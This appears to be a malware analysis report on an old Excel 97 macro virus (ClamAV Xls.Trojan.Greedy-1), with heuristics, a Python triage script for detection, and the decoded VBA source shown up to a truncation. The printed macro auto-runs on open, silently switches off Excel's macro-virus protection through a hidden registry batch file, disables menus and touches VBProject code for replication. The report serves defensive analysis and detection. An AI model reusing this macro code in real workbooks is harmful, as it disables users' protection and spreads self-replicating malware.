Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7553226f9def1302…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1999-05-14 09:16:33
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: fa1c9ea791966ec81979ea131e41afdc
SHA-1: fbe4fff006259dde993afc55c2fe44c57920f88e
SHA-256: 7553226f9def130223b40fe7fc180e7b2a4f42fd17f4914b4601ff0df95c44fd
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File

The file is an Excel workbook carrying VBA macros and targeting Excel 97 (it writes to the Office\8.0 registry hive). Its Auto_Open procedure registers a second routine, Dmizer, as the Application.OnSheetActivate handler. Dmizer writes c:\o6.reg, a REGEDIT4 file that sets HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6 to 0 (the Excel 97 macro-virus-protection flag; zeroing it switches off the macro warning), writes c:\o6.bat containing "regedit /s c:\o6.reg", and runs the batch file hidden via Shell(). It then disables entries on the Tools, View and Window command bars and enumerates the workbook's VBProject components while preparing a reference to Personal.xls in the Excel startup folder. That is the pattern of a self-replicating Excel macro virus of the period rather than of a downloader: the visible portion of the recovered source contains no download or network code. Random alphanumeric Rem lines are interleaved throughout as junk-comment padding. The ClamAV detection Xls.Trojan.Greedy-1 is consistent with this assessment.

Heuristics (6)

  • ClamAV: Xls.Trojan.Greedy-1 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Greedy-1
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The Dmizer routine runs Shell ("c:\o6.bat"), vbHide, executing the batch file it has just written with the window hidden
  • Auto_Open macro (high) OLE_VBA_AUTO
    Auto_Open runs when the workbook is opened and registers Dmizer as the OnSheetActivate handler, so the payload fires on the first sheet switch
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This check catches p-code-only documents, and documents where source extraction fails, so that a macro is flagged even when no readable source is available. Here the source was recovered, so this finding corroborates the two above rather than adding new behaviour.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks (script obfuscation, encoded payload blobs, packed data, or execution/download terms).
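The following Python script is an added example and not output of the analyzer that produced this report. It applies the same logic as the OLE_VBA_AUTO, OLE_VBA_SHELL and auto-exec-plus-execution heuristics to decoded VBA source, strips the random alphanumeric Rem filler lines before scanning (the lines that a naive "base64-like blob" count picks up), extracts the paths the macro writes and executes, and flags the Excel 97 Options6 macro-protection write seen in this sample. The token lists, weights and verdict thresholds are this example's own assumptions, and the embedded sample is a constructed, shortened excerpt modelled on the carved macros.bas rather than the artifact itself.

```python
"""Static triage of decoded VBA macro source.

Added example, not output of the analyzer behind this report. It applies the
OLE_VBA_AUTO / OLE_VBA_SHELL / auto-exec-plus-execution logic to extracted
source, ignores the random alphanumeric Rem filler lines, and flags the
Excel 97 Options6 macro-protection write seen in this sample.
"""
import json
import re

# Constructed, shortened excerpt modelled on the carved macros.bas (junk Rem
# lines reduced to two); not the full carved artifact.
SAMPLE_VBA = r'''
Attribute VB_Name = "Dmize"
Sub Auto_Open()
Application.OnSheetActivate = "Dmizer"
End Sub

Sub Dmizer()
On Error Resume Next
Rem B179K367R357B428G971W542K263C502U983P714N416
If UCase(Dir("c:\o6.reg")) <> "O6.REG" Then
Open "c:\o6.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Close 1
Rem U33R36E209O547O159D289W509V507N99C392V251F464
Open "c:\o6.bat" For Output As 1
Print #1, "regedit /s c:\o6.reg"
Close 1
End If
Shell ("c:\o6.bat"), vbHide
CommandBars("Tools").Controls(10).Enabled = False
Set Aw = ActiveWorkbook.VBProject.VBComponents
End Sub
'''

# Token lists and weights below are this example's own assumptions.
AUTOEXEC = re.compile(r"\b(Auto_?Open|Auto_?Close|Workbook_Open|Document_Open|"
                      r"AutoExec|OnSheetActivate)\b", re.I)
EXEC_TOKENS = re.compile(r"\b(WScript\.Shell|Shell|ShellExecute|CreateObject|"
                         r"URLDownloadToFile|XMLHTTP|PowerShell)\b", re.I)
FILE_WRITE = re.compile(r'Open\s+"([^"]+)"\s+For\s+(?:Output|Append|Binary)', re.I)
SHELL_TARGET = re.compile(r'\bShell\s*\(?\s*"([^"]+)"', re.I)
VBPROJECT = re.compile(r"\b(?:VBProject|VBComponents|CodeModule)\b", re.I)
# Filler comments: "Rem" or "'" followed only by letter+digits groups.
JUNK_COMMENT = re.compile(r"^(?:Rem\s+|')(?:[A-Z]\d+){2,}$", re.I)
# Excel 97 keeps its macro-virus-protection flag in Options6 under the 8.0 key;
# writing dword:0 there switches the macro warning off.
OPTIONS6 = re.compile(r'Options6"*\s*=\s*dword:0+\b', re.I)


def strip_comments(src):
    """Return (code_lines, junk_count): drop comments, count filler lines."""
    code, junk = [], 0
    for line in src.splitlines():
        s = line.strip()
        if not s:
            continue
        if JUNK_COMMENT.match(s):
            junk += 1
        elif s.startswith("'") or s.lower().startswith("rem "):
            pass  # ordinary comment, ignored
        else:
            code.append(s)
    return code, junk


def triage(src):
    """Score decoded VBA source the way the OLE_VBA_* heuristics do."""
    code, junk = strip_comments(src)
    text = "\n".join(code)
    r = {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(text)}),
        "exec_tokens": sorted({m.group(1) for m in EXEC_TOKENS.finditer(text)}),
        "files_written": sorted({m.group(1).lower() for m in FILE_WRITE.finditer(text)}),
        "shell_targets": sorted({m.group(1).lower() for m in SHELL_TARGET.finditer(text)}),
        "touches_vbproject": bool(VBPROJECT.search(text)),
        "disables_macro_protection": bool(OPTIONS6.search(text)),
        "junk_comment_lines": junk,
    }
    score = 0
    if r["autoexec"]:
        score += 30
    if r["exec_tokens"]:
        score += 40
    if r["autoexec"] and r["exec_tokens"]:
        score += 20  # auto-exec plus execution primitive: the high-confidence pair
    if r["files_written"]:
        score += 10
    if r["disables_macro_protection"]:
        score += 30
    if r["touches_vbproject"]:
        score += 20  # self-modifying / replicating macro code
    r["score"] = score
    r["verdict"] = "malicious" if score >= 70 else "suspicious" if score >= 30 else "clean"
    return r


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Running the script on the excerpt reports Auto_Open and OnSheetActivate as entry points, Shell as the execution primitive, c:\o6.reg and c:\o6.bat as written files, c:\o6.bat as the Shell target, the Options6 write and the VBProject access, and counts the two filler lines separately so they do not inflate the obfuscation signal. Comment stripping happens before token matching on purpose: junk-comment padding is meant to break byte signatures, and scanning only code lines keeps the verdict tied to behaviour.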

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6950 bytes
SHA-256: 959ce642061840d13201eb2d0863bcf144b94aee93750cb4f89576c6748eb8f7
Detection
ClamAV: Xls.Trojan.Greedy-1
Obfuscation or payload: likely
Carved artifact contains 12 long base64-like blob(s). These correspond to the random alphanumeric Rem comment lines interleaved with the code in the preview; they are junk-comment padding that defeats naive signature matching, not an encoded payload.
Script preview (first 1,000 lines of the extracted source)
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Dmize"
Sub Auto_Open()
Application.OnSheetActivate = "Dmizer"
End Sub

Sub Dmizer()
On Error Resume Next
Rem B179K367R357B428G971W542K263C502U983P714N416
'This is taken from Shiver by AVM | Thanks
'-------------------------------------------------------------------

Rem S662U831U56T908F555X634N152M556T389R185D502D265P809Q288N352K256K787J700E527L948J126W635S928X471R954N257K40E150V229R182Q417Q19
If UCase(Dir("c:\o6.reg")) <> "O6.REG" Or UCase(Dir("c:\o6.bat")) <> "O6.BAT" Then
Rem C535C102V198I568P921R777U84G755B552F933K823G410I415V469K507P344O829K236S804V575I937S539E460I820T215D637F800J4T960
Rem P950X502R729U668J650T807C595I484P247K474J233F37B511V430J16T671W542O560W892V935J265F200O891S79W933I639U618F555U631J621E757O521F769N841S570P337G585

Open "c:\o6.reg" For Output As 1
Print #1, "REGEDIT4"
Rem V122E933F136V521D626B790U705Q357S525X231S800K456U569J8E212I923
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Close 1
Rem B763N40G81W963G21O0P530E293C552J963G795R996G742H381F923B501

Rem U33R36E209O547O159D289W509V507N99C392V251F464
Open "c:\o6.bat" For Output As 1
Rem W702V12S497W711G773N15M798J931N303U668V748F12H844S971P314X673Q907F497J669R469P453Q899Q689I277C396E408J452B805F105T333B740W91N898I560L538Q994B552U57
Rem S392D865Q562E239F473L341U562S749P681P747E982P331W62C478R345P664O734S626U496Q382E400F490
Rem I570U836N69H200
Print #1, "regedit /s c:\o6.reg"
Rem K990K835E488T316D906H912K746L749J763C247G357W634U215F715
Close 1
End If

Rem P711M792Q365K618Q259K799T107K386M987G707I482G634F71W101V768M863S16N521N821F778P154
Rem K364W559R785N559T669W479W659S742C179J775S693U400S230S474N139N784T112R183C448X979J567O584P778F395Q292Q941C489N271P435D594T645K173V99C462O510L497
Shell ("c:\o6.bat"), vbHide
Rem U622Q576V156J817K322H267X927L804E527V36C184W178F495I207O846M240D937V183W541T619M520F946P96U773N360G555W43O488J528
Rem R420X552R632T913J914T721V602B626X162C444R579D678F2S282C629L673P853D3C648U666Q212E74T858D664S154E169U311O130C830D663M387Q476R973K135O292

Rem E981L200Q311U91B680D603D964D233L255
Rem T357N431O77K163V896W668C632J926G706U373D666L540F944I953W876D266M969S650J412I443Q844L30
Rem K125J430D873V566L668C874
Rem K801C214P619D68R758U381C161P269U496M360U43P811D839C574H66F907G691G148
'-------------------------------------------------------------------
Rem L628G251W845U653W462K154K534G883W864L697E768R64N92D207Q472F494J857R84I270F805X824T310O990S454N112N944U167S226G789F624Q531O734O381P65L524

CommandBars("Tools").Controls(10).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
Rem N117H378O547N937S756C384W895T719G601N277O503U364H996G154R253O822O490V941D482L121N331K894K479D866V974
Rem O982I289E342R994Q935L505H29S827
CommandBars("View").Controls(3).Enabled = False
CommandBars("Window").Controls(3).Enabled = False
CommandBars("Window").Controls(4).Enabled = False

Rem R810G45O407I443R197M324S142N991V610T380J639S444
Am = Application.VBE.SelectedVBComponent.Name
Set Aw = ActiveWorkbook.VBProject.VBComponents
Rem I241N984
Data = "c:\win95.sys"
Rem W635S683G29B840F55K580O265T488R567D361H742L841I208
Px = "Personal.xls"
Pxx = Application.StartupPath & "\" & Px
Rem G884J492O395K980P869G903S69F737
WorkIns = 0
GlobalIns = 0

Rem Q576W783C145K364W544T490Q479F132S315L211D971W615M59U462H270H619H21U463X345Q901H27K636N998I675J978I107B361H105N358P203W389G805N723G956R368R351C212E603
Rem V218V276M15E93W217E634D585P366F915K75I930
Rem T704Q180D944S610S231F902R
... (truncated)